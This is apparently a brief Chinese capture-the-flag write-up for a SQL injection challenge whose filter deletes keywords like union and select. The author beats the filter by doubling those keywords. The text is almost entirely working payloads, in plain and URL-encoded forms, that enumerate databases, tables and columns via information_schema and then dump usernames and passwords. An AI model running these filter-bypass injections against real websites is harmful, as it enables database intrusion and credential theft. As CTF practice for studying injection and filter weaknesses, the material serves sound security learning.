把关键函数（or/select/union等）给替换为空，可以利用双写绕过，其他都算常规操作。

1' union select 1,2,3#

1'%20ununionion%20seselectlect%201,2,3%23

1' union select 1,2,group_concat(schema_name)from information_schema.schemata#

1'%20uniunionon%20seselectlect%201,2,group_concat(schema_name)frfromom%20infoorrmation_schema.schemata%23

1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=0x6765656B#

1'%20ununionion%20seselectlect%201,2,group_concat(table_name)frfromom%20infoorrmation_schema.tables%20whewherere%20table_schema%3D0x6765656B%23

1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name=0x62346273716C#

1'%20ununionion%20selselectect%201,2,group_concat(column_name)frfromom%20infoorrmation_schema.columns%20whewherere%20table_name%3D0x62346273716C%23

最后得到flag，太长了不截全啦（~

1' union select 1,2,group_concat(username,0x3b,password)from b4bsql#

1'%20uniunionon%20selselectect%201,2,group_concat(username,0x3b,passwoorrd)frfromom%20b4bsql%23